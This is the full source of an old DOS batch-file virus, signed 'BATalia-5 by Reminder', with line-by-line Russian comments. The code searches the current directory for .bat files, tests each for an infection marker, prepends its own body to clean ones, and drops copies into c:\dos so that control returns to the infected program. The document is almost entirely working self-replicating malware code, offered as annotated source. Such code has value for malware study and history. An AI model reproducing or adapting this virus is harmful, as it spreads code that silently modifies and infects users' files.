@echo off ; эхо AKA "ОТОБРАЖЕНИЕ КОМАНД" выключено
rem YYY  ; Метка вируса
if "%1"=="5" goto s ; если вызван с параметром 2 то собсно обработчик
for %%b in (*.bat) do call %0 5 %%b  ; Перебор всех батников в текущем каталоге
  ; и если найден хоть один, то вызов себя же с параметрами [2] и [имя батника]
goto b ; конец перебора -  отдать управление зараженной программе   
:s   ; начало обработчика
copy %2 p>l  ; скопировать найденный батник в p
echo NNN>>p  ; добавить в конец p строку NNN
echo 1>z1    ; создать файл z1 со строкой 1
echo 2>z2    ; создать файл z2 со строкой 2
echo 3>z3    ; создать файл z3 со строкой 3
del z?/p<p>l  ; Происходит удаление созданных 3 файлов, на основе 
 ; информации, полученной из найденного батника (в дальнейшем - батника)
 ; если батник уже заражен нами - то произойдет удаление всех файлов -
 ; ( строка YYY в начале вируса ) - если в теле батника нет нужных букв
 ; N или Y - то строка NNN добавленная нами в конец батника не даст 
 ; застыть команде DEL в ожидании нажатия на клавиатуру. 
if exist z? goto i ; если существует хоть один файл Z? - то батник
 ; не заражен вирусом и поэтому подлежит заражению.
goto e   ; если вдруг батник уже с вирусом - вернемся к перебору.
:i    ; процедура заражения
type %0>b  ; скопировать чистый вирус (до байта 0A) в файл b
copy b a/a>l  ; скопировать чистый вирус в файл a с добавлением 0A в конец
copy %2 t>l   ; скопировать батник в файл t
copy /ba+t %2>l  ; скопировать вирус с 0A + t в батник (внедрится в начало) 
goto e    ; продолжить перебор
:b   ; Процедура передачи управления старой (нашей) проге
echo rem               >x ; деоаем файл x со строкой rem, пробелами и ентером  
copy x+x+x+x y>l   ; файл y уже будет содержать 4 rem`а, пробелы и 4 ентера
copy y+y+y+y+y+y z>l  ; файл z будет содержать 24 rem`a, пробелы и 24 ентера
echo @%%comspec%% nul /ccopy c:\dos\y %%0>>z ; в конец файла z добавляется
 ; вышеследующая строка 
copy z c:\dos\x>l ; и этот файл z - копируется в c:\dos\x
copy %0 c:\dos\y>l ; а наша (исполняемая) прога в c:\dos\y
del ??>l  ; удаляем все промежуточные файлы
echo on ; эхо включено
@copy c:\dos\x %0>nul  ; ---------
:e                              ; |
:[BATalia-5] (c) by Reminder      ; |
  